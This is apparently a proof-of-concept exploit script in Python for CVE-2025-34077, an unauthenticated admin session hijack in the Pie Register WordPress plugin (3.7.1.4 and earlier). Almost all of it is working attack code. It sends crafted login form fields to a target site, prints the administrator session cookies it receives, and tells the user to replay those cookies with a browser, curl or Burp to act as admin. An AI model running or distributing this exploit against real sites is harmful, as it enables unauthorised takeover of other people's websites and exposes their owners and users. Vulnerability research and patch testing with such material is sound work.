#!/usr/bin/env python3 import requests import sys from bs4 import BeautifulSoup BANNER = r""" _______ ________ ___ ___ ___ _____ ____ _ _ ___ ______ ______ / ____\ \ / / ____| |__ \ / _ \__ \| ____| |___ \| || | / _ \____ |____ | | | \ \ / /| |__ ______ ) | | | | ) | |__ ______ __) | || |_| | | | / / / / | | \ \/ / | __| |______| / /| | | |/ /|___ \ |______| |__ <|__ _| | | | / / / / | |____ \ / | |____ / /_| |_| / /_ ___) | ___) | | | | |_| |/ / / / \_____| \/ |______| |____|\___/____|____/ |____/ |_| \___//_/ /_/ by Mrj Haxcore | CVE-2025-34077 """ HELP = """ Usage: python3 pie.py Description: This script exploits an unauthenticated admin session hijack vulnerability in the Pie Register WordPress plugin <= 3.7.1.4 to steal admin cookies. Options: -h, --help Show this help message and exit """ def main(): print(BANNER) if len(sys.argv) < 2 or sys.argv[1] in ['-h', '--help']: print(HELP) sys.exit(0) target = sys.argv[1].rstrip('/') login_url = f"{target}/" headers = { "User-Agent": "Mozilla/5.0 (PoC Exploit for CVE-2025-34077)" } data = { "user_id_social_site": "1", # Admin ID "social_site": "true", "piereg_login_after_registration": "true", "_wp_http_referer": "/login/", "log": "null", "pwd": "null" } print("[*] Sending payload to hijack admin session...") try: resp = requests.post(login_url, data=data, headers=headers, allow_redirects=False) except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") sys.exit(1) cookies = resp.cookies.get_dict() if cookies: print("\n[+] Successfully hijacked cookies for user_id=1 (admin):") for k, v in cookies.items(): print(f" {k} = {v}") print("\n[!] Use these cookies in your browser or tools like curl or Burp to act as admin.") else: print("[-] Failed to get any cookies. Target may be patched or not vulnerable.") print(f"[i] HTTP Status: {resp.status_code}") print(f"[i] Response Headers: {resp.headers}") if __name__ == "__main__": main()